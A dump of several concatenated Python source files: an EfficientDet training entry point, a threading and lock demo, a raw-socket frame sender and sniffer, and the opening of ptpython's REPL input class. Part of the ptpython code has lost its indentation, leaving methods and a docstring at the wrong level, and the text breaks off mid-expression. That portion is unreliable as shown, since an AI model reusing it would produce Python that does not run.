  'train', 'eval' (watch for new checkpoints), or 'train_and_eval'.
  """
  if FLAGS.strategy == 'tpu':
    tf.disable_eager_execution()
    tpu_cluster_resolver = tf.distribute.cluster_resolver.TPUClusterResolver(
        FLAGS.tpu, zone=FLAGS.tpu_zone, project=FLAGS.gcp_project)
    tpu_grpc_url = tpu_cluster_resolver.get_master()
    tf.Session.reset(tpu_grpc_url)
  else:
    tpu_cluster_resolver = None
  # Check data path
  if FLAGS.mode in ('train', 'train_and_eval'):
    if FLAGS.training_file_pattern is None:
      raise RuntimeError('Must specify --training_file_pattern for train.')
  if FLAGS.mode in ('eval', 'train_and_eval'):
    if FLAGS.validation_file_pattern is None:
      raise RuntimeError('Must specify --validation_file_pattern for eval.')
  # Parse and override hparams
  config = hparams_config.get_detection_config(FLAGS.model_name)
  config.override(FLAGS.hparams)
  if FLAGS.num_epochs:  # NOTE: remove this flag after updating all docs.
    config.num_epochs = FLAGS.num_epochs
  # Parse image size in case it is in string format.
  config.image_size = utils.parse_image_size(config.image_size)
  # The following is for spatial partitioning. `features` has one tensor while
  # `labels` had 4 + (`max_level` - `min_level` + 1) * 2 tensors. The input
  # partition is performed on `features` and all partitionable tensors of
  # `labels`, see the partition logic below.
  # In the TPUEstimator context, the meaning of `shard` and `replica` is the
  # same; following the API, here has mixed use of both.
  if FLAGS.use_spatial_partition:
    # Checks input_partition_dims agrees with num_cores_per_replica.
    # NOTE(review): the two string literals below concatenate without a space
    # ("arrayelements") -- the message is slightly garbled.
    if FLAGS.num_cores_per_replica != np.prod(FLAGS.input_partition_dims):
      raise RuntimeError('--num_cores_per_replica must be a product of array'
                         'elements in --input_partition_dims.')
    labels_partition_dims = {
        'mean_num_positives': None,
        'source_ids': None,
        'groundtruth_data': None,
        'image_scales': None,
        'image_masks': None,
    }
    # The Input Partition Logic: We partition only the partition-able tensors.
    feat_sizes = utils.get_feat_sizes(
        config.get('image_size'), config.get('max_level'))
    for level in range(config.get('min_level'), config.get('max_level') + 1):
      def _can_partition(spatial_dim):
        # A spatial dim is partitionable iff every partition dim divides it.
        partitionable_index = np.where(
            spatial_dim % np.array(FLAGS.input_partition_dims) == 0)
        return len(partitionable_index[0]) == len(FLAGS.input_partition_dims)
      spatial_dim = feat_sizes[level]
      if _can_partition(spatial_dim['height']) and _can_partition(
          spatial_dim['width']):
        labels_partition_dims['box_targets_%d' %
                              level] = FLAGS.input_partition_dims
        labels_partition_dims['cls_targets_%d' %
                              level] = FLAGS.input_partition_dims
      else:
        labels_partition_dims['box_targets_%d' % level] = None
        labels_partition_dims['cls_targets_%d' % level] = None
    num_cores_per_replica = FLAGS.num_cores_per_replica
    input_partition_dims = [FLAGS.input_partition_dims, labels_partition_dims]
    num_shards = FLAGS.num_cores // num_cores_per_replica
  else:
    num_cores_per_replica = None
    input_partition_dims = None
    num_shards = FLAGS.num_cores
  params = dict(
      config.as_dict(),
      model_name=FLAGS.model_name,
      iterations_per_loop=FLAGS.iterations_per_loop,
      model_dir=FLAGS.model_dir,
      num_shards=num_shards,
      num_examples_per_epoch=FLAGS.num_examples_per_epoch,
      strategy=FLAGS.strategy,
      backbone_ckpt=FLAGS.backbone_ckpt,
      ckpt=FLAGS.ckpt,
      val_json_file=FLAGS.val_json_file,
      testdev_dir=FLAGS.testdev_dir,
      profile=FLAGS.profile,
      mode=FLAGS.mode)
  config_proto = tf.ConfigProto(
      allow_soft_placement=True, log_device_placement=False)
  if FLAGS.strategy != 'tpu':
    if FLAGS.use_xla:
      config_proto.graph_options.optimizer_options.global_jit_level = (
          tf.OptimizerOptions.ON_1)
      config_proto.gpu_options.allow_growth = True
  model_dir = FLAGS.model_dir
  model_fn_instance = det_model_fn.get_model_fn(FLAGS.model_name)
  max_instances_per_image = config.max_instances_per_image
  if FLAGS.eval_samples:
    # Ceiling division: enough steps to cover all eval samples.
    eval_steps = int((FLAGS.eval_samples + FLAGS.eval_batch_size - 1) //
                     FLAGS.eval_batch_size)
  else:
    eval_steps = None
  total_examples = int(config.num_epochs * FLAGS.num_examples_per_epoch)
  train_steps = total_examples // FLAGS.train_batch_size
  logging.info(params)
  if not tf.io.gfile.exists(model_dir):
    tf.io.gfile.makedirs(model_dir)
  # Persist the resolved config next to the checkpoints for reproducibility.
  config_file = os.path.join(model_dir, 'config.yaml')
  if not tf.io.gfile.exists(config_file):
    tf.io.gfile.GFile(config_file, 'w').write(str(config))
  train_input_fn = dataloader.InputReader(
      FLAGS.training_file_pattern,
      is_training=True,
      use_fake_data=FLAGS.use_fake_data,
      max_instances_per_image=max_instances_per_image)
  eval_input_fn = dataloader.InputReader(
      FLAGS.validation_file_pattern,
      is_training=False,
      use_fake_data=FLAGS.use_fake_data,
      max_instances_per_image=max_instances_per_image)
  if FLAGS.strategy == 'tpu':
    tpu_config = tf.estimator.tpu.TPUConfig(
        FLAGS.iterations_per_loop if FLAGS.strategy == 'tpu' else 1,
        num_cores_per_replica=num_cores_per_replica,
        input_partition_dims=input_partition_dims,
        per_host_input_for_training=tf.estimator.tpu.InputPipelineConfig
        .PER_HOST_V2)
    run_config = tf.estimator.tpu.RunConfig(
        cluster=tpu_cluster_resolver,
        model_dir=model_dir,
        log_step_count_steps=FLAGS.iterations_per_loop,
        session_config=config_proto,
        tpu_config=tpu_config,
        save_checkpoints_steps=FLAGS.save_checkpoints_steps,
        tf_random_seed=FLAGS.tf_random_seed,
    )
    # TPUEstimator can do both train and eval.
    train_est = tf.estimator.tpu.TPUEstimator(
        model_fn=model_fn_instance,
        train_batch_size=FLAGS.train_batch_size,
        eval_batch_size=FLAGS.eval_batch_size,
        config=run_config,
        params=params)
    eval_est = train_est
  else:
    strategy = None
    if FLAGS.strategy == 'gpus':
      strategy = tf.distribute.MirroredStrategy()
    run_config = tf.estimator.RunConfig(
        model_dir=model_dir,
        train_distribute=strategy,
        log_step_count_steps=FLAGS.iterations_per_loop,
        session_config=config_proto,
        save_checkpoints_steps=FLAGS.save_checkpoints_steps,
        tf_random_seed=FLAGS.tf_random_seed,
    )
    def get_estimator(global_batch_size):
      # Per-replica batch size: global size divided across sync replicas.
      params['num_shards'] = getattr(strategy, 'num_replicas_in_sync', 1)
      params['batch_size'] = global_batch_size // params['num_shards']
      return tf.estimator.Estimator(
          model_fn=model_fn_instance, config=run_config, params=params)
    # train and eval need different estimator due to different batch size.
    train_est = get_estimator(FLAGS.train_batch_size)
    eval_est = get_estimator(FLAGS.eval_batch_size)
  # start train/eval flow.
  if FLAGS.mode == 'train':
    train_est.train(input_fn=train_input_fn, max_steps=train_steps)
    if FLAGS.eval_after_training:
      eval_est.evaluate(input_fn=eval_input_fn, steps=eval_steps)
  elif FLAGS.mode == 'eval':
    # Run evaluation when there's a new checkpoint
    for ckpt in tf.train.checkpoints_iterator(
        FLAGS.model_dir,
        min_interval_secs=FLAGS.min_eval_interval,
        timeout=FLAGS.eval_timeout):
      logging.info('Starting to evaluate.')
      try:
        eval_results = eval_est.evaluate(eval_input_fn, steps=eval_steps)
        # Terminate eval job when final checkpoint is reached.
        try:
          current_step = int(os.path.basename(ckpt).split('-')[1])
        except IndexError:
          logging.info('%s has no global step info: stop!', ckpt)
          break
        utils.archive_ckpt(eval_results, eval_results['AP'], ckpt)
        if current_step >= train_steps:
          logging.info('Eval finished step %d/%d', current_step, train_steps)
          break
      except tf.errors.NotFoundError:
        # Checkpoint might have been deleted by the time eval finished.
        # We simply skip such cases.
        logging.info('Checkpoint %s no longer exists, skipping.', ckpt)
  elif FLAGS.mode == 'train_and_eval':
    # Resume from the latest checkpoint's epoch if one exists.
    ckpt = tf.train.latest_checkpoint(FLAGS.model_dir)
    try:
      step = int(os.path.basename(ckpt).split('-')[1])
      current_epoch = (
          step * FLAGS.train_batch_size // FLAGS.num_examples_per_epoch)
      logging.info('found ckpt at step %d (epoch %d)', step, current_epoch)
    except (IndexError, TypeError):
      logging.info('Folder %s has no ckpt with valid step.', FLAGS.model_dir)
      current_epoch = 0
    def run_train_and_eval(e):
      # One epoch of training followed by one evaluation + ckpt archiving.
      print('\n =====> Starting training, epoch: %d.' % e)
      train_est.train(
          input_fn=train_input_fn,
          max_steps=e * FLAGS.num_examples_per_epoch // FLAGS.train_batch_size)
      print('\n =====> Starting evaluation, epoch: %d.' % e)
      eval_results = eval_est.evaluate(input_fn=eval_input_fn, steps=eval_steps)
      ckpt = tf.train.latest_checkpoint(FLAGS.model_dir)
      utils.archive_ckpt(eval_results, eval_results['AP'], ckpt)
    epochs_per_cycle = 1  # higher number has less graph construction overhead.
    for e in range(current_epoch + 1, config.num_epochs + 1, epochs_per_cycle):
      if FLAGS.run_epoch_in_child_process:
        # Running each epoch in a child process releases leaked CPU memory.
        p = multiprocessing.Process(target=run_train_and_eval, args=(e,))
        p.start()
        p.join()
        if p.exitcode != 0:
          return p.exitcode
      else:
        tf.compat.v1.reset_default_graph()
        run_train_and_eval(e)
  else:
    logging.info('Invalid mode: %s', FLAGS.mode)
if __name__ == '__main__':
  # absl.app parses the command-line flags and then invokes main(argv).
  app.run(main)
|
Thread.py | import time, threading
def loop():
    # Worker body for the demo threads started in the __main__ block below.
    # NOTE(review): ``i`` is not defined in this function -- it resolves to
    # the module-global loop index set by ``for i in range(3)`` below.  That
    # only works because each thread is join()ed before the next one starts;
    # pass the index as an argument if the threads ever run concurrently.
    print(" thread %s is begin runging" %(threading.current_thread().name))
    print(" thread %s run %d" % (threading.current_thread().name,i))
    time.sleep(1)
    print(" thread %s run %d end" % (threading.current_thread().name,i))
if __name__ =='__main__':
    print(" thread %s is begin runging" %(threading.current_thread().name))
    # Start three child threads one at a time; join() makes this strictly
    # sequential, so the global ``i`` read inside loop() is stable while each
    # thread runs.
    for i in range(3):
        t=threading.Thread(target=loop,name='childThread')
        t.start()
        t.join()
    print(" thread %s is end" %(threading.current_thread().name))
def change_it(n):
    """Add *n* to the shared balance, then subtract it again.

    The net effect is zero, but the two separate read-modify-write steps on
    the global make this a classic data-race demo when called from multiple
    threads without a lock.
    """
    global balance
    balance += n
    balance -= n
    print('current balance:%d'%(balance))


# Shared state touched by change_it(); run_thread() below guards it with
# the module-level lock.
balance = 0
lock = threading.Lock()
def run_thread(n):
    """Call change_it(n) 10000 times, serializing each call with the lock."""
    for _ in range(10000):
        # ``with lock`` replaces the manual acquire/try/finally: the lock is
        # still released even if change_it() raises, with less boilerplate.
        with lock:
            change_it(n)
run_thread(10)
transport.py | import socket
import threading
from . import api
def send_flows(config: api.Config) -> None:
    """Send the first configured flow's frame and print one sniffed packet.

    Opens two AF_PACKET raw sockets (Linux-only, needs CAP_NET_RAW):
    ``src`` for sending the flow's frame bytes, and ``dst`` with protocol
    ETH_P_ALL (0x0003) for receiving.  A helper thread blocks in recvfrom()
    and prints whatever arrives; the frame is then sent and the thread joined.

    BUG FIX: the original leaked both raw sockets; they are now closed in a
    ``finally`` block even when bind/send fails.
    """
    src = socket.socket(socket.AF_PACKET, socket.SOCK_RAW)
    dst = socket.socket(
        socket.AF_PACKET, socket.SOCK_RAW, socket.ntohs(0x0003)
    )
    try:
        f = config.flows[0]
        # NOTE(review): AF_PACKET bind takes (interface, protocol); the
        # ``src_port``/``dst_port`` attributes are presumably interface
        # names -- confirm against api.Config.
        src.bind((f.src_port, 0))
        dst.bind((f.dst_port, 0))
        t = threading.Thread(target=lambda: print(dst.recvfrom(65535)))
        t.start()
        src.send(f.frame_bytes)
        t.join()
    finally:
        src.close()
        dst.close()
|
python_input.py | """
Application for reading Python input.
This can be used for creation of Python REPLs.
"""
import __future__
import threading
from asyncio import get_event_loop
from functools import partial
from typing import TYPE_CHECKING, Any, Callable, Dict, Generic, List, Optional, TypeVar
from prompt_toolkit.application import Application, get_app
from prompt_toolkit.auto_suggest import (
AutoSuggestFromHistory,
ConditionalAutoSuggest,
ThreadedAutoSuggest,
)
from prompt_toolkit.buffer import Buffer
from prompt_toolkit.completion import (
Completer,
DynamicCompleter,
FuzzyCompleter,
ThreadedCompleter,
)
from prompt_toolkit.document import Document
from prompt_toolkit.enums import DEFAULT_BUFFER, EditingMode
from prompt_toolkit.filters import Condition
from prompt_toolkit.formatted_text import AnyFormattedText
from prompt_toolkit.history import (
FileHistory,
History,
InMemoryHistory,
ThreadedHistory,
)
from prompt_toolkit.input import Input
from prompt_toolkit.key_binding import (
ConditionalKeyBindings,
KeyBindings,
merge_key_bindings,
)
from prompt_toolkit.key_binding.bindings.auto_suggest import load_auto_suggest_bindings
from prompt_toolkit.key_binding.bindings.open_in_editor import (
load_open_in_editor_bindings,
)
from prompt_toolkit.key_binding.vi_state import InputMode
from prompt_toolkit.lexers import DynamicLexer, Lexer, SimpleLexer
from prompt_toolkit.output import ColorDepth, Output
from prompt_toolkit.styles import (
AdjustBrightnessStyleTransformation,
BaseStyle,
ConditionalStyleTransformation,
DynamicStyle,
SwapLightAndDarkStyleTransformation,
merge_style_transformations,
)
from prompt_toolkit.utils import is_windows
from prompt_toolkit.validation import ConditionalValidator, Validator
from .completer import CompletePrivateAttributes, HidePrivateCompleter, PythonCompleter
from .history_browser import PythonHistory
from .key_bindings import (
load_confirm_exit_bindings,
load_python_bindings,
load_sidebar_bindings,
)
from .layout import CompletionVisualisation, PtPythonLayout
from .lexer import PtpythonLexer
from .prompt_style import ClassicPrompt, IPythonPrompt, PromptStyle
from .style import generate_style, get_all_code_styles, get_all_ui_styles
from .utils import get_jedi_script_from_document, unindent_code
from .validator import PythonValidator
__all__ = ["PythonInput"]
if TYPE_CHECKING:
    # Imported only for the type checker; typing_extensions is not a runtime
    # dependency of this module.
    from typing_extensions import Protocol

    class _SupportsLessThan(Protocol):
        # Taken from typeshed. _T is used by "sorted", which needs anything
        # sortable.
        def __lt__(self, __other: Any) -> bool:
            ...

# Option values must be sortable so the sidebar can cycle them in order.
_T = TypeVar("_T", bound="_SupportsLessThan")
class OptionCategory:
    """A titled group of `Option` objects: one section of the sidebar menu."""

    def __init__(self, title: str, options: List["Option"]) -> None:
        self.title = title
        self.options = options
class Option(Generic[_T]):
    """
    One configurable ptpython setting, shown and cycled from the sidebar.

    :param title: Text.
    :param description: Text.
    :param get_values: Callable that returns a dictionary mapping the
        possible values to callbacks that activate these value.
    :param get_current_value: Callable that returns the current, active value.
    """

    def __init__(
        self,
        title: str,
        description: str,
        get_current_value: Callable[[], _T],
        # We accept `object` as return type for the select functions, because
        # often they return an unused boolean. Maybe this can be improved.
        get_values: Callable[[], Dict[_T, Callable[[], object]]],
    ) -> None:
        self.title = title
        self.description = description
        self.get_current_value = get_current_value
        self.get_values = get_values

    @property
    def values(self) -> Dict[_T, Callable[[], object]]:
        # Re-evaluated on each access so the set of choices can be dynamic.
        return self.get_values()

    def activate_next(self, _previous: bool = False) -> None:
        """
        Select the value after the current one (wrapping around) and invoke
        its activation callback.
        """
        choices = sorted(self.values.keys())
        # Locate the active value; fall back to the first entry when the
        # current value is not among the choices.
        try:
            position = choices.index(self.get_current_value())
        except ValueError:
            position = 0
        step = -1 if _previous else 1
        # Wrap around and fire the handler for the newly selected value.
        self.values[choices[(position + step) % len(choices)]]()

    def activate_previous(self) -> None:
        """
        Select and activate the value before the current one.
        """
        self.activate_next(_previous=True)
# Human-readable labels for the color-depth option shown in the sidebar.
COLOR_DEPTHS = {
    ColorDepth.DEPTH_1_BIT: "Monochrome",
    ColorDepth.DEPTH_4_BIT: "ANSI Colors",
    ColorDepth.DEPTH_8_BIT: "256 colors",
    ColorDepth.DEPTH_24_BIT: "True color",
}
# A "namespace" here is the globals/locals mapping handed to the REPL's
# compile/eval machinery.
_Namespace = Dict[str, Any]
_GetNamespace = Callable[[], _Namespace]
class PythonInput:
"""
Prompt for reading Python input.
::
python_input = PythonInput(...)
python_code = python_input.app.run()
"""
    def __init__(
        self,
        get_globals: Optional[_GetNamespace] = None,
        get_locals: Optional[_GetNamespace] = None,
        history_filename: Optional[str] = None,
        vi_mode: bool = False,
        color_depth: Optional[ColorDepth] = None,
        # Input/output.
        input: Optional[Input] = None,
        output: Optional[Output] = None,
        # For internal use.
        extra_key_bindings: Optional[KeyBindings] = None,
        _completer: Optional[Completer] = None,
        _validator: Optional[Validator] = None,
        _lexer: Optional[Lexer] = None,
        _extra_buffer_processors=None,
        _extra_layout_body=None,
        _extra_toolbars=None,
        _input_buffer_height=None,
    ) -> None:
        """
        Build the prompt: completers, validator, history, default settings,
        buffers, styles, layout and finally the prompt_toolkit Application.
        """
        self.get_globals: _GetNamespace = get_globals or (lambda: {})
        self.get_locals: _GetNamespace = get_locals or self.get_globals

        self.completer = _completer or PythonCompleter(
            self.get_globals,
            self.get_locals,
            lambda: self.enable_dictionary_completion,
        )

        # Wrap the completer: fuzzy matching and private-attribute hiding are
        # toggled at runtime through the settings below.
        self._completer = HidePrivateCompleter(
            FuzzyCompleter(
                DynamicCompleter(lambda: self.completer),
                enable_fuzzy=Condition(lambda: self.enable_fuzzy_completion),
            ),
            lambda: self.complete_private_attributes,
        )
        self._validator = _validator or PythonValidator(self.get_compiler_flags)
        self._lexer = PtpythonLexer(_lexer)

        self.history: History
        if history_filename:
            self.history = ThreadedHistory(FileHistory(history_filename))
        else:
            self.history = InMemoryHistory()

        self._input_buffer_height = _input_buffer_height
        self._extra_layout_body = _extra_layout_body or []
        self._extra_toolbars = _extra_toolbars or []
        self._extra_buffer_processors = _extra_buffer_processors or []

        self.extra_key_bindings = extra_key_bindings or KeyBindings()

        # Settings.
        self.title: AnyFormattedText = ""
        self.show_signature: bool = False
        self.show_docstring: bool = False
        self.show_meta_enter_message: bool = True
        self.completion_visualisation: CompletionVisualisation = (
            CompletionVisualisation.MULTI_COLUMN
        )
        self.completion_menu_scroll_offset: int = 1

        self.show_line_numbers: bool = False
        self.show_status_bar: bool = True
        self.wrap_lines: bool = True
        self.complete_while_typing: bool = True
        self.paste_mode: bool = (
            False  # When True, don't insert whitespace after newline.
        )
        self.confirm_exit: bool = (
            True  # Ask for confirmation when Control-D is pressed.
        )
        # 'None' means that meta-enter is always required (the sidebar
        # "meta-enter" choice stores None here, hence Optional).
        self.accept_input_on_enter: Optional[int] = 2  # Accept when pressing Enter 'n' times.

        self.enable_open_in_editor: bool = True
        self.enable_system_bindings: bool = True
        self.enable_input_validation: bool = True
        self.enable_auto_suggest: bool = False
        self.enable_mouse_support: bool = False
        self.enable_history_search: bool = False  # When True, like readline, going
        # back in history will filter the
        # history on the records starting
        # with the current input.

        self.enable_syntax_highlighting: bool = True
        self.enable_fuzzy_completion: bool = False
        self.enable_dictionary_completion: bool = False
        self.complete_private_attributes: CompletePrivateAttributes = (
            CompletePrivateAttributes.ALWAYS
        )
        self.swap_light_and_dark: bool = False
        self.highlight_matching_parenthesis: bool = False
        self.show_sidebar: bool = False  # Currently show the sidebar.

        # Pager.
        self.enable_output_formatting: bool = False
        self.enable_pager: bool = False

        # When the sidebar is visible, also show the help text.
        self.show_sidebar_help: bool = True

        # Currently show 'Do you really want to exit?'
        self.show_exit_confirmation: bool = False

        # The title to be displayed in the terminal. (None or string.)
        self.terminal_title: Optional[str] = None

        self.exit_message: str = "Do you really want to exit?"
        self.insert_blank_line_after_output: bool = True  # (For the REPL.)
        self.insert_blank_line_after_input: bool = False  # (For the REPL.)

        # The buffers.
        self.default_buffer = self._create_buffer()
        self.search_buffer: Buffer = Buffer()
        self.docstring_buffer: Buffer = Buffer(read_only=True)

        # Tokens to be shown at the prompt.
        self.prompt_style: str = "classic"  # The currently active style.

        # Styles selectable from the menu.
        self.all_prompt_styles: Dict[str, PromptStyle] = {
            "ipython": IPythonPrompt(self),
            "classic": ClassicPrompt(),
        }
        self.get_input_prompt = lambda: self.all_prompt_styles[
            self.prompt_style
        ].in_prompt()
        self.get_output_prompt = lambda: self.all_prompt_styles[
            self.prompt_style
        ].out_prompt()

        #: Load styles.
        self.code_styles: Dict[str, BaseStyle] = get_all_code_styles()
        self.ui_styles = get_all_ui_styles()
        self._current_code_style_name: str = "default"
        self._current_ui_style_name: str = "default"

        if is_windows():
            self._current_code_style_name = "win32"

        self._current_style = self._generate_style()
        self.color_depth: ColorDepth = color_depth or ColorDepth.default()

        self.max_brightness: float = 1.0
        self.min_brightness: float = 0.0

        # Options to be configurable from the sidebar.
        self.options = self._create_options()
        self.selected_option_index: int = 0

        #: Incrementing integer counting the current statement.
        self.current_statement_index: int = 1

        # Code signatures. (This is set asynchronously after a timeout.)
        self.signatures: List[Any] = []

        # Boolean indicating whether we have a signatures thread running.
        # (Never run more than one at the same time.)
        self._get_signatures_thread_running: bool = False

        # Get into Vi navigation mode at startup
        self.vi_start_in_navigation_mode: bool = False

        # Preserve last used Vi input mode between main loop iterations
        self.vi_keep_last_used_mode: bool = False

        self.style_transformation = merge_style_transformations(
            [
                ConditionalStyleTransformation(
                    SwapLightAndDarkStyleTransformation(),
                    filter=Condition(lambda: self.swap_light_and_dark),
                ),
                AdjustBrightnessStyleTransformation(
                    lambda: self.min_brightness, lambda: self.max_brightness
                ),
            ]
        )
        self.ptpython_layout = PtPythonLayout(
            self,
            lexer=DynamicLexer(
                lambda: self._lexer
                if self.enable_syntax_highlighting
                else SimpleLexer()
            ),
            input_buffer_height=self._input_buffer_height,
            extra_buffer_processors=self._extra_buffer_processors,
            extra_body=self._extra_layout_body,
            extra_toolbars=self._extra_toolbars,
        )

        self.app = self._create_application(input, output)

        if vi_mode:
            self.app.editing_mode = EditingMode.VI
    def _accept_handler(self, buff: Buffer) -> bool:
        # Called when the input is accepted: exit the application run loop,
        # handing the entered text back to `read()`, and schedule a buffer
        # reset for the next prompt iteration.
        app = get_app()
        app.exit(result=buff.text)
        app.pre_run_callables.append(buff.reset)

        return True  # Keep text, we call 'reset' later on.
@property
def option_count(self) -> int:
" Return the total amount of options. (In all categories together.) "
return sum(len(category.options) for category in self.options)
@property
def selected_option(self) -> Option:
" Return the currently selected option. "
i = 0
for category in self.options:
for o in category.options:
if i == self.selected_option_index:
return o
else:
i += 1
raise ValueError("Nothing selected")
def get_compiler_flags(self) -> int:
"""
Give the current compiler flags by looking for _Feature instances
in the globals.
"""
flags = 0
for value in self.get_globals().values():
try:
if isinstance(value, __future__._Feature):
f = value.compiler_flag
flags |= f
except BaseException:
# get_compiler_flags should never raise to not run into an
# `Unhandled exception in event loop`
# See: https://github.com/prompt-toolkit/ptpython/issues/351
# An exception can be raised when some objects in the globals
# raise an exception in a custom `__getattribute__`.
pass
return flags
@property
def add_key_binding(self) -> Callable[[_T], _T]:
"""
Shortcut for adding new key bindings.
(Mostly useful for a config.py file, that receives
a PythonInput/Repl instance as input.)
::
@python_input.add_key_binding(Keys.ControlX, filter=...)
def handler(event):
...
"""
def add_binding_decorator(*k, **kw):
return self.extra_key_bindings.add(*k, **kw)
return add_binding_decorator
    def install_code_colorscheme(self, name: str, style: BaseStyle) -> None:
        """
        Register an additional color scheme for the Python code.
        """
        self.code_styles[name] = style

    def use_code_colorscheme(self, name: str) -> None:
        """
        Activate a previously installed code color scheme, by name.
        """
        assert name in self.code_styles

        self._current_code_style_name = name
        self._current_style = self._generate_style()

    def install_ui_colorscheme(self, name: str, style: BaseStyle) -> None:
        """
        Register an additional color scheme for the user interface.
        """
        self.ui_styles[name] = style

    def use_ui_colorscheme(self, name: str) -> None:
        """
        Activate a previously installed UI color scheme, by name.
        """
        assert name in self.ui_styles

        self._current_ui_style_name = name
        self._current_style = self._generate_style()

    def _use_color_depth(self, depth: ColorDepth) -> None:
        # Sidebar callback: switch the terminal color depth.
        self.color_depth = depth

    def _set_min_brightness(self, value: float) -> None:
        # Keep the invariant min <= max by pushing max up when needed.
        self.min_brightness = value
        self.max_brightness = max(self.max_brightness, value)

    def _set_max_brightness(self, value: float) -> None:
        # Keep the invariant min <= max by pushing min down when needed.
        self.max_brightness = value
        self.min_brightness = min(self.min_brightness, value)
def _generate_style(self) -> BaseStyle:
"""
Create new Style instance.
(We don't want to do this on every key press, because each time the
renderer receives a new style class, he will redraw everything.)
"""
return generate_style(
self.code_styles[self._current_code_style_name],
self.ui_styles[self._current_ui_style_name],
)
    def _create_options(self) -> List[OptionCategory]:
        """
        Create a list of `Option` instances for the options sidebar.
        """

        def enable(attribute: str, value: Any = True) -> bool:
            # Set `self.<attribute>` to `value`.
            setattr(self, attribute, value)

            # Return `True`, to be able to chain this in the lambdas below.
            return True

        def disable(attribute: str) -> bool:
            # Set `self.<attribute>` to False; also chainable (returns True).
            setattr(self, attribute, False)
            return True

        def simple_option(
            title: str, description: str, field_name: str, values: Optional[List] = None
        ) -> Option:
            " Create simple on/off option for the boolean `self.<field_name>`. "
            values = values or ["off", "on"]

            def get_current_value():
                return values[bool(getattr(self, field_name))]

            def get_values():
                return {
                    values[1]: lambda: enable(field_name),
                    values[0]: lambda: disable(field_name),
                }

            return Option(
                title=title,
                description=description,
                get_values=get_values,
                get_current_value=get_current_value,
            )

        # 0.00, 0.05, ..., 1.00 for the brightness options below.
        brightness_values = [1.0 / 20 * value for value in range(0, 21)]

        return [
            OptionCategory(
                "Input",
                [
                    Option(
                        title="Editing mode",
                        description="Vi or emacs key bindings.",
                        get_current_value=lambda: ["Emacs", "Vi"][self.vi_mode],
                        get_values=lambda: {
                            "Emacs": lambda: disable("vi_mode"),
                            "Vi": lambda: enable("vi_mode"),
                        },
                    ),
                    simple_option(
                        title="Paste mode",
                        description="When enabled, don't indent automatically.",
                        field_name="paste_mode",
                    ),
                    Option(
                        title="Complete while typing",
                        description="Generate autocompletions automatically while typing. "
                        'Don\'t require pressing TAB. (Not compatible with "History search".)',
                        get_current_value=lambda: ["off", "on"][
                            self.complete_while_typing
                        ],
                        # Mutually exclusive with history search; turning one
                        # on turns the other off.
                        get_values=lambda: {
                            "on": lambda: enable("complete_while_typing")
                            and disable("enable_history_search"),
                            "off": lambda: disable("complete_while_typing"),
                        },
                    ),
                    Option(
                        title="Complete private attrs",
                        description="Show or hide private attributes in the completions. "
                        "'If no public' means: show private attributes only if no public "
                        "matches are found or if an underscore was typed.",
                        get_current_value=lambda: {
                            CompletePrivateAttributes.NEVER: "Never",
                            CompletePrivateAttributes.ALWAYS: "Always",
                            CompletePrivateAttributes.IF_NO_PUBLIC: "If no public",
                        }[self.complete_private_attributes],
                        get_values=lambda: {
                            "Never": lambda: enable(
                                "complete_private_attributes",
                                CompletePrivateAttributes.NEVER,
                            ),
                            "Always": lambda: enable(
                                "complete_private_attributes",
                                CompletePrivateAttributes.ALWAYS,
                            ),
                            "If no public": lambda: enable(
                                "complete_private_attributes",
                                CompletePrivateAttributes.IF_NO_PUBLIC,
                            ),
                        },
                    ),
                    Option(
                        title="Enable fuzzy completion",
                        description="Enable fuzzy completion.",
                        get_current_value=lambda: ["off", "on"][
                            self.enable_fuzzy_completion
                        ],
                        get_values=lambda: {
                            "on": lambda: enable("enable_fuzzy_completion"),
                            "off": lambda: disable("enable_fuzzy_completion"),
                        },
                    ),
                    Option(
                        title="Dictionary completion",
                        description="Enable experimental dictionary/list completion.\n"
                        'WARNING: this does "eval" on fragments of\n'
                        "         your Python input and is\n"
                        "         potentially unsafe.",
                        get_current_value=lambda: ["off", "on"][
                            self.enable_dictionary_completion
                        ],
                        get_values=lambda: {
                            "on": lambda: enable("enable_dictionary_completion"),
                            "off": lambda: disable("enable_dictionary_completion"),
                        },
                    ),
                    Option(
                        title="History search",
                        description="When pressing the up-arrow, filter the history on input starting "
                        'with the current text. (Not compatible with "Complete while typing".)',
                        get_current_value=lambda: ["off", "on"][
                            self.enable_history_search
                        ],
                        get_values=lambda: {
                            "on": lambda: enable("enable_history_search")
                            and disable("complete_while_typing"),
                            "off": lambda: disable("enable_history_search"),
                        },
                    ),
                    simple_option(
                        title="Mouse support",
                        description="Respond to mouse clicks and scrolling for positioning the cursor, "
                        "selecting text and scrolling through windows.",
                        field_name="enable_mouse_support",
                    ),
                    simple_option(
                        title="Confirm on exit",
                        description="Require confirmation when exiting.",
                        field_name="confirm_exit",
                    ),
                    simple_option(
                        title="Input validation",
                        description="In case of syntax errors, move the cursor to the error "
                        "instead of showing a traceback of a SyntaxError.",
                        field_name="enable_input_validation",
                    ),
                    simple_option(
                        title="Auto suggestion",
                        description="Auto suggest inputs by looking at the history. "
                        "Pressing right arrow or Ctrl-E will complete the entry.",
                        field_name="enable_auto_suggest",
                    ),
                    Option(
                        title="Accept input on enter",
                        description="Amount of ENTER presses required to execute input when the cursor "
                        "is at the end of the input. (Note that META+ENTER will always execute.)",
                        get_current_value=lambda: str(
                            self.accept_input_on_enter or "meta-enter"
                        ),
                        get_values=lambda: {
                            "2": lambda: enable("accept_input_on_enter", 2),
                            "3": lambda: enable("accept_input_on_enter", 3),
                            "4": lambda: enable("accept_input_on_enter", 4),
                            "meta-enter": lambda: enable("accept_input_on_enter", None),
                        },
                    ),
                ],
            ),
            OptionCategory(
                "Display",
                [
                    Option(
                        title="Completions",
                        description="Visualisation to use for displaying the completions. (Multiple columns, one column, a toolbar or nothing.)",
                        get_current_value=lambda: self.completion_visualisation.value,
                        get_values=lambda: {
                            CompletionVisualisation.NONE.value: lambda: enable(
                                "completion_visualisation", CompletionVisualisation.NONE
                            ),
                            CompletionVisualisation.POP_UP.value: lambda: enable(
                                "completion_visualisation",
                                CompletionVisualisation.POP_UP,
                            ),
                            CompletionVisualisation.MULTI_COLUMN.value: lambda: enable(
                                "completion_visualisation",
                                CompletionVisualisation.MULTI_COLUMN,
                            ),
                            CompletionVisualisation.TOOLBAR.value: lambda: enable(
                                "completion_visualisation",
                                CompletionVisualisation.TOOLBAR,
                            ),
                        },
                    ),
                    Option(
                        title="Prompt",
                        description="Visualisation of the prompt. ('>>>' or 'In [1]:')",
                        get_current_value=lambda: self.prompt_style,
                        get_values=lambda: dict(
                            (s, partial(enable, "prompt_style", s))
                            for s in self.all_prompt_styles
                        ),
